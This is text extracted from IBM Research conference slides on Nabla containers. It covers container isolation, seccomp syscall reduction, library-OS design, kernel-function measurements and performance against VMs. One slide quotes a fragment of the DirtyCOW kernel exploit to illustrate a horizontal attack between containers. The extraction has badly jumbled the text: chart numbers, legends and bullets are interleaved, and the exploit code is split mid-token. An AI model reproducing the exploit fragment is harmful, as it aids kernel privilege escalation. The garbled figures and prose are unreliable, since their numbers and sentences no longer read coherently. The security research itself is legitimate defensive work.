Kubecon China 2018

Nabla containers: a new approach to container isolation Brandon Lum, Ricardo Koller , Dan Williams, Sahil Suneja IBM Research https://nabla-containers.github.io Containers are not securely Isolated

2 Containers are not securely Isolated

- What does this exactly mean?

- Why are VMs considered secure but not containers?

- How do we improve container isolation?

3 Overview

• Threat Model: Isolation • Isolation through surface reduction • Our approach: Nabla • Measuring Isolation • Nabla vs VMs?

4 What does it mean to be isolated?

• Containers that are co-located containers should not be able to access data of another

Service • Scenarios: A • Horizontal attacks from vulnerable secret attacker services • Container-native multi-tenant cloud

Kernel Container Isolation Reality

• Containers == namespaced containers processes à Kernel exploits mostly work • Sep 2018: CVE-2018-14634 • DirtyCOW (CVE-2016-5195) Service Exploit via A • Many more (CVE database), syscalls 2018: Codexec (3), Mem. Corrupt (8) secret attacker

• Horizontal attack possible via shared privileged component attacker (kernel) Kernel DirtyCOW

• DityCow Exploit Sketch: // FROM: https://dirtycow.ninja/

• mmap a page map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE • Create a thread that invokes ,f,0); printf("mmap %zx\n\n",(uintptr_t) map); madvise /* You have to do it on two threads. */ • Create a thread that invokes pthread_create(&pth1,NULL,madviseThread,argv[1 ]); //madvise Read/Write procfs pthread_create(&pth2,NULL,procselfmemThread,ar gv[2]); // R/W procfs • Triggers race condition in Kernel /* You have to wait for the threads to finish. Mem. management code */ pthread_join(pth1,NULL); pthread_join(pth2,NULL); return 0;

7 Container Isolation Reality

containers

Service A

secret attacker

attacker

Kernel Kernel Footprint

Application • Exploits target vulnerable part of kernel via syscalls.

> 300 Syscalls • If we restrict the number of syscalls • à Less reachable kernel functions

FS • à Less potential vulnerabilities • à Less possible exploits disk

Kernel Docker Default Policy

Application • Docker default seccomp policy • disables around 44 system calls out of 300+. seccomp (Whitelisting policy) ~ 280 Syscalls 44 Syscalls • Generic seccomp policies – hard to create s.t. it is secure • Syscall profiling is mostly heuristic based FS

disk Greyed – unreachable functions Kernel Nabla

Application

Original 300+ Syscall interface* LibOS seccomp 7 Syscalls • Deterministic and generic seccomp policy • Only 7 syscalls! FS • Uses LibOS techniques

disk

Kernel Nabla

• Taking unikernel ideas and putting it into containers

“Unikernels as Processes” • Using tools/technologies from the (ACM SoCC ’18) rumprun and solo5 community (https://dl.acm.org/citation.cfm?id=3267845)

• Modify unikernel to work as a process

12 Making and running a Nabla

Application • Build app. Application with custom LibOS build process* seccomp Build process* 7 Syscalls Nabla > 300 Syscalls Binary

Application Application

• Nabla runtime, Application Application LibOS LibOS seccomp seccomp runnc loads the 7 Syscalls 7 Syscalls nabla binaries runc runnc and sets up seccomp Container Runtime profiles

*current limitation of build process, we are investigating ways to consider removing a custom build process 13 Demo

14 strace/ measurements (Low is good)

strace Application measures syscalls invoked. > 300 Syscalls

FS

disk Kernel

ftrace measures number of boxes touched. 15 ftrace measurements (lower is better)

Kata-containers (VMs) What does this say about Nabla our isolation vs VMs?

16 Have we surpassed VM isolation?

• We explored and contested this idea in our paper:

“Say Goodbye to Virtualization for a Safer Cloud” (USENIX HotCloud 2018) (https://www.usenix.org/conference/hotcloud18/presentation/williams)

• Maybe… But several questions: • Implementation specific comparisons? KVM vs other hypervisors • Hardware inclusive threat model (Spectre/Meltdown, etc.) • Other metrics

17 What’s Next?

• We want to engage the community:

• Development work for runnc/nabla-base-build/nabla-demo-apps • Remove need to rebuild nabla containers (Support for dynamic linking LibOS) • Create new images and more language support for applications

• Chime in on Improving Security Analysis/Metrics • https://github.com/nabla-containers/nabla-measurements

18 Thank You! https://nabla-containers.github.io

Brandon Lum (@lumjjb) – [email protected]

#NablaContainers

19 Backup

20 ftrace measurements (lower is better)

Application

> 300 Syscalls

FS

disk Kernel

Measuring number of boxes Touched. 21 Throughput (higher is better)

22 Demo

IMAGE REGISTRY Kubelet Image pull (OCI image spec)

CRI containerd runc Cri-containerd Other Config from podSpec CNI i.e. mounts, security, etc. Run Container runnc Container Runtime (OCI Runtime Spec)

CNI Plugin

23 Inside a Nabla container Application Original • Unmodified user code (e.g., Node.js, Container redis, nginx, etc.) Libc

• Rumprun library OS NetBSD • Unmodified NetBSD code + some glue TCP/IP • Runs on thin Solo5 unikernel interface FS … Rumprun glue • Nabla Tender • Setup of seccomp policy Solo5 • Translates Solo5 calls to system calls � Tender Backup: Containers vs VMs

25 Overview

• Threat Model: Isolation • What makes VMs isolated? • Nabla: How do we get those isolation properties without overhead?

Disclaimer: In this talk, we are doing a 1:1 comparison. Defense in depth is a valid discussion with a different set of trade-offs.

26 Containers VMs

Pro- Guest cess ☠ OS ☠

Host Kernel Hypervisor (+ Host Kernel (root))

High Level - Syscalls: Low Level – VT: Filesystem interface, Block Dev. Interface, socket interface, TAP interface, etc. etc.

27 Containers VMs

Guest Application Process Guest . FS OS .

Interface

Interface FS

disk Infra

A LOT more disk exploitable code in Infra the infrastructure!!! 28 Lower level interface

Less code

Fewer vulnerabilities

Stronger isolation 30 Kernel functions accessed by applications

1600 processContainer • Compared to standard 1400 ukvmVM containers 1200 nablanabla • 5-6x less kernel functions 1000 accessed • 8-14x fewer syscalls 800 600 • About half the number 400 Unique kernel of kernel functions accessed as VMs!

functions accessed 200 0 nginx nginx-largenode-expressredis-get redis-set Accessible kernel functions under Nabla policy

700 accept • Trinity kernel fuzz 600 nabla block tester to try to access 500 as much of kernel as 30 possible 400 300 0 • 200 Nabla policy reduces 0 10 amount of accessible 100 Unique kernel functions kernel functions by 0 98% 0 50 100 150 200 250 300 Unikernel isolation comes from the interface

Hypercall Resource • Direct mapping between 10 walltime clock_gettime hypercalls and system puts write stdout call/resource pairs poll ppoll net_fd blkinfo • 6 for I/O blkwrite pwrite64 blk_fd • Network: packet level blkread pread64 blk_fd • Storage: block level netinfo netwrite write net_fd netread read net_fd • vs. >350 syscalls halt exit_group

33 SOCC

34 Implementation: nabla �

• Extended Solo5 unikernel ecosystem and ukvm • Prototype supports: • MirageOS • IncludeOS • Rumprun

• https://github.com/solo5/solo5

35 Measuring isolation: common applications

• Code reachable 1600 through interface is process 1400 ukvm a metric for attack 1200 nabla surface 1000 • Used kernel ftrace 800 600 400 Unique kernel

• Results: functions accessed 200 0 • Processes: 5-6x more nginx nginx-largenode-expressredis-get redis-set • VMs: 2-3x more

36 Measuring isolation: fuzz testing

• Used kernel ftrace 700 accept • Used trinity 600 nabla block system call fuzzer to 500 try to access more of 30 the kernel 400 300 0 200 • Results: 0 10 100 • Nabla policy reduces Unique kernel functions by 98% over a 0 0 50 100 150 200 250 300 “normal” process

37 Measuring performance: throughput

245 • Applications include: 200% ukvm 180% • Web servers nabla QEMU/KVM • Python benchmarks 160% • Redis 140% no I/O with I/O • etc. 120% 100% Normalized throughput

80% py_tornado py_chameleon node_fib mirage_HTTP py_2to3 node_express nginx_large redis_get redis_set includeos_TCP nginx includeos_UDP • Results: • 101%-245% higher throughput than ukvm

38 Measuring performance: CPU utilization

120 100 • vmexits have an effect on 80 60 instructions per cycle (a) 40 CPU % 20 100 0 80 60

• Experiment with MirageOS (b) 40 20 VMexits/ms web server 0 1.5 • Results: 1 () • 12% reduction in cpu 0.5 nabla

IPC (ins/cycle) ukvm utilization over ukvm 0 0 5000 10000 15000 20000 Requests/sec

39 Measuring performance: startup time

• Startup time is important QEMU/KVM ukvm nabla process for serverless, NFV 30 30 30 750 QEMU/KVM 20 20 20 ukvm 500 500 nabla 10 10 10 process Hello world • Results: 250 Hello world 0 • Ukvm has 30-370% higher 0 0 0 0 200 200 200 latency than nabla 1500 1500 150 150 150 1000 1000 100 100 100 500 500 50 50 50 HTTP POST • Mostly due avoiding KVM HTTP Post 0 0 0 0 0 overheads 246810121416 246810121416 246810121416 246810121416 02468101214 Number of cores

40